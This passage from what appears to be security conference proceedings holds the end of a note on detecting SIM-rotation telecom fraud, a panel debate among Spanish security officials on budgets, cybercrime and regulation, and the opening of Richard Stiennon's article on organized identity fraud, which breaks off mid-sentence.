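The first rule keys on the shape of the traffic rather than on any single SIM, which is what survives SIM rotation: the rotating IMSIs still all converge on one B-number with an international forward. The second rule catches the rotation itself, since the handset identity (IMEI) stays constant while the SIM identity changes.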
DEBATE

To what extent is it compatible to combat new threats with reduced budgets, as we now have?

Tomás Roy Catalá: When you have to make a budget reduction it does not mean that everything, and always, will have to be reduced. In the end it is a matter of common sense. For example, we have avoided redundancy, and make the most of the security capacities of the network devices.

And how do you also make the reduction in R&D compatible with this budget reduction?

Fernando García Vicent: The level of threats existing today forces us to be more effective and efficient. We cannot continue to apply the same methods as before; it also requires us to have more knowledge of the technology and available devices. It also demands more efficiency in each organization's internal business processes.

Have you turned the attacks suffered in your organizations into something positive, to achieve greater appreciation and justify the need for greater budgetary allocation?

Marta Villén Sotomayor: I really think so. We must take advantage of these incidents to further raise the awareness of senior management.

Tomás Roy Catalá: It has created a high level of interaction and a greater awareness; on that side, very good. Although I would like to make it clear that we have to assume responsibilities in any case, not delegate them, and act in case of crisis.

Marcos Gómez Hidalgo: We have been reactive, and I say this with regret. And I think it is much better to present our department by the incidents that we have avoided, and not by other types of news.

Are we losing the battle against the "dark side"?

Marta Villén Sotomayor: In my opinion, we have not lost it. I think it is a very difficult battle, and it always keeps us active and innovating.

Juan Salom Clotet: I think they are winning by a mile.
Because we have tools to fight, but the problem is that the "bad guys" work with impunity. In addition, we look at the large sums, but really this scenario is riddled with small offences, which often do not reach 400 euros.

Tomás Roy Catalá: Regarding the "dark side" I have to say two things: not all are crimes, as demonstrated by some actions of organized citizen groups; and I think that we must seek other channels, because there has been a certain manipulation in this game to go against public institutions.

Rafael Ortega García: The fight has always existed and will continue to exist. I am as pessimistic as Juan Salom on the legislative side, but I also believe that this makes technology evolve. However, the offences that do not come to light, remaining inside the company, are what matter most to me.

Fernando García Vicent: I would add to the feeling of impunity the big lack of awareness that seems to exist in society and enterprises.
David Barroso: They are quite ahead of us and are more determined. And we are not creating tougher laws to compensate.

Marcos Gómez Hidalgo: It is also a matter of image, with figures such as the security "Cyber-Czar". More than 40% of the attacks come from the US... they stop in Europe, but we are not going to stop things there.

How do you see the role of regulators in the field of information security?

Rafael Ortega García: Europe is hyper-regulated, so I think that either we minimize the transpositions, for example, or it is impossible to deploy them. I would like to count on regulation by sector, and it would be enough.

Elena Maestre García: It is important to regulate and define some common frameworks for action and homogenization, always with a dose of reality, without it being "regulating for the sake of it". And, in addition, we should be more exquisite, because I see an over-regulation that is never supervised.

Fernando García Vicent: The legislation will always be behind. We require a work of coordination and implementation from the States, both at local and European levels.

Alfonso Martín Palma: It is surprising that there are sectors where there is no regulation to that effect, especially in the US, as in the nuclear field. I believe there must be impositions in the field of regulation, because, as we know, if things are optional, they will be applied seldom, if ever.
THE RISE OF CYBERCRIME: HOW LAGGING SECURITY MEASURES FUEL THE GROWTH IN ORGANIZED FRAUD
Richard Stiennon (Chief Research Analyst. IT Harvest)

Cybercrime has increased dramatically over the past years even though the strength of the inhibitors has also increased, such as greater security and more fruitful international cooperation to fight it. Although, certainly, there are also more and more powerful drivers that promote the ease of attacks, such as the ubiquity of the Internet, the advent of electronic commerce and the emergence of an identity market, which have essentially brought new vulnerabilities. The identity market subject is especially complex and harmful. Here the hackers specialized in stealing identities from the banks to sell them later in the market, where the fraudulent card manufacturers used them. They resorted to the recruitment of people from within the organization, using the privileges of the people in the networks. And there they got organized into large fraudulent companies dedicated to buying and selling identities and specific tools. The problem here is that anyone who has access to the information becomes a potential thief. But that can no longer be so, because it is as though you could not trust anyone. We are entering the phase of what we call the hacking of business processes. And what can somehow